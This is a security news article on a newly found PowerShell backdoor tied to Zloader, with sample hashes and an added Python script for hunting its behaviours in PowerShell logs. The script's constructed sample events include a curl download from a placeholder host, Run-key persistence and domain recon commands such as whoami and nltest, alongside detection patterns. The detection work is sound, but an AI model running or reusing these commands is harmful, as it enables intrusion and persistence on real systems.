Walmart Discovers New PowerShell Backdoor Linked to Zloader Malware

A previously unknown PowerShell backdoor has been discovered alongside a new variant of the Zloader/SilentNight malware, Walmart’s Cyber Intelligence Team has reported.

The backdoor was built to give threat actors a further foothold: it performs reconnaissance on the infected host and deploys additional malware samples, including Zloader.

The backdoor also relies on sophisticated obfuscation techniques. The researchers said it was potentially used alongside the new Zloader variant.

There is no indication the malware combination was targeted at Walmart. The retail giant’s cyber intelligence team revealed it made the discovery while proactively investigating new threats.

“The threat actor involved has links to Zloader/SilentNight, which CISA has linked to Black Basta publicly, so the aim would be breach and ransom activities,” a Walmart spokesperson told Infosecurity.

Zloader began life as a banking Trojan, but has undergone significant development over recent years, adding new functionality. The malware has been linked to a number of Russian ransomware-as-a-service groups over the years, including Ryuk, DarkSide and Black Basta.

Attackers Focusing on Obfuscation

Walmart told Infosecurity that the PowerShell backdoor overlaps with a previously observed PowerShell malware called PowerDash, particularly in how both build the system data sent to the command and control (C2) infrastructure and in the obfuscation techniques both use to hide the more important components of the backdoor.

PowerDash, discovered in 2023, collects information about the compromised system, forwards it to attacker-controlled C2 servers and awaits further commands.

Walmart’s Cyber Intelligence team noted that very few samples of the newly discovered PowerShell backdoor are available on VirusTotal, which makes detection more challenging.

“Incidentally, the samples don’t appear to detonate very well in most sandboxes which also helps them slip under the radar for longer,” the spokesperson added.

Walmart also observed that the design of the backdoor fits a broader trend among some of the more advanced threat actors: a switch to scripting languages for backdoors.

“The key advice would be verifying your internal pivoting detections such as the common hardcoded strings that threat actors and malware use for gathering information about the infected organization,” the spokesperson commented.

How the Unknown PowerShell Backdoor Operates

The researchers began by analyzing the following sample, identified by its compilation timestamp and hashes:

  • Compilation timestamp: 2023-05-29 16:24:50 UTC
    MD5: 83aa432c43f01541e4f1e2f995940e69
    SHA-1: 931b6fd3e7ee5631fbc583640805809d9f2acc58
    SHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e

They then discovered two more files with the same characteristics, both .NET binaries packed with AgilDotNet:

  • Compilation timestamp: 2023-05-30 10:31:17 UTC
    MD5: 41563d1f34b704728988a53833577076
    SHA-1: 72a572ce8247f80946e71f637c3403228543d9a3
    SHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b
  • Compilation timestamp: 2023-05-30 10:31:14 UTC
    MD5: e447362fb2686062a3dfc921c10dd6c7
    SHA-1: 544599ef72cbd97fe50e4169c8401270ff3b917b
    SHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb

The team unpacked and decrypted the binary to recover the backdoor functionality, which uncovered a hardcoded filename within the embedded PowerShell script.


The script first performs a series of checks. If they fail, the malware moves itself and removes all of its previously written data. If they pass, it sets up a number of variables in the script.

This includes writing a VB downloader to disk alongside the executable file. The downloader contains a double base64-encoded URL that is decoded to reveal the download site.

The script then executes a hardcoded curl command that downloads and executes files from the encoded URL, first checking whether it is already running. Scheduled tasks are installed under a hardcoded name combined with a random GUID.

At this point, the script sets up a Run key and performs an admin-privilege check and an internet connectivity check.

The Walmart team found “heavily obfuscated” sections of code inside the script, extracted those code blobs and analyzed them.

The first blob of code was an anti-virtual machine (VM) check, used to thwart attempts at analysis.

The next block builds the information the bot sends to the C2, along with its responses to issued commands. This traffic is encrypted using AES in CBC mode.

This enables reconnaissance to be performed, additional machine information to be gathered, and all of the data sent to the C2 during the initial run to be encoded.
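The behaviours described above (a double base64-encoded download URL, a scheduled task named with a random GUID, a Run key for persistence, and the hardcoded recon strings the Walmart spokesperson advised checking for) all leave traces in PowerShell script block logging (Event ID 4104). The following hunt script is an added example written for this article; it is not Walmart’s tooling or the backdoor’s own code. The log entries, the placeholder URL http://example.invalid/payload.ps1, the task name “Updater” and the GUID are constructed for illustration, and the recon string list is an assumed starting point to be extended with an organization’s own observations.

```python
"""Hunt PowerShell script-block log text for the backdoor behaviours described above.

Added example: the events, URL, task name and GUID below are constructed, not real samples.
"""
import base64
import binascii
import re

# Placeholder download site (reserved .invalid TLD), nested in base64 the way the article describes.
PLACEHOLDER_URL = "http://example.invalid/payload.ps1"
CONSTRUCTED_GUID = "3f2a9c1e-7b4d-4e8a-9f01-2c5d6e7f8a9b"

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")          # long base64-looking tokens
URL_RE = re.compile(r"https?://[^\s'\"]+")
TASK_CMD_RE = re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.IGNORECASE)
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
# Assumed recon strings; extend with what your own environment sees used for internal pivoting.
RECON_STRINGS = ("whoami", "net group", "nltest", "Get-ADComputer", "systeminfo", "ipconfig")


def nest_base64(text, layers=2):
    """Base64-encode `text` `layers` times (used here only to build the sample event)."""
    data = text.encode("ascii")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


def decode_base64_layers(blob, max_layers=4):
    """Peel nested base64 until the content stops being valid base64 ASCII.

    Returns (layers_removed, plaintext). A double-encoded URL yields (2, url):
    the URL contains characters outside the base64 alphabet such as ':' and '.',
    so strict decoding refuses a third pass.
    """
    text, layers = blob, 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(text, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not decoded:
            break
        text, layers = decoded, layers + 1
    return layers, text


def analyse(script_text):
    """Return a list of finding labels for one script block."""
    findings = []
    for token in B64_RE.findall(script_text):
        layers, plain = decode_base64_layers(token)
        url = URL_RE.search(plain)
        if layers and url:
            findings.append(f"nested_base64_url:{layers}:{url.group(0)}")
    if TASK_CMD_RE.search(script_text) and GUID_RE.search(script_text):
        findings.append("guid_named_task:" + GUID_RE.search(script_text).group(0))
    if RUN_KEY_RE.search(script_text):
        findings.append("run_key_persistence")
    hits = [s for s in RECON_STRINGS if s.lower() in script_text.lower()]
    if hits:
        findings.append("recon_strings:" + ",".join(hits))
    return findings


# Constructed script-block events in the shape of Event ID 4104 ScriptBlockText (not real samples).
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText":
        "$u=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("
        "[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
        + nest_base64(PLACEHOLDER_URL) + "')))); curl.exe -s $u -o $env:TEMP\\x.ps1"},
    {"id": 2, "ScriptBlockText":
        "Register-ScheduledTask -TaskName 'Updater-" + CONSTRUCTED_GUID + "' -Action $a -Trigger $t"},
    {"id": 3, "ScriptBlockText":
        "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value $p"},
    {"id": 4, "ScriptBlockText":
        "whoami /all; net group \"domain admins\" /domain; nltest /dclist:"},
    {"id": 5, "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},  # benign control
]


def hunt(events):
    """Return {event id: findings} for every event that triggers at least one detection."""
    results = {}
    for ev in events:
        findings = analyse(ev["ScriptBlockText"])
        if findings:
            results[ev["id"]] = findings
    return results


if __name__ == "__main__":
    for ev_id, findings in hunt(SAMPLE_EVENTS).items():
        print(ev_id, findings)
```

The base64 peeler uses strict decoding on purpose: the article’s downloader hides its URL under two layers, and a URL will not survive a third strict pass, so the layer count itself becomes a signal. Against real 4104 logs, feed each event’s ScriptBlockText to `analyse` and treat multiple findings in one block (for example a nested URL plus a GUID-named task) as a much stronger indicator than any single one.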

SonicWall’s 2024 Mid-Year Cyber Threat Report found that PowerShell – a legitimate Windows automation tool used by administrators and developers – is now abused by over 90% of malware families.

PowerShell scripts are used for various malicious tasks, including to evade detection and to download additional malware.
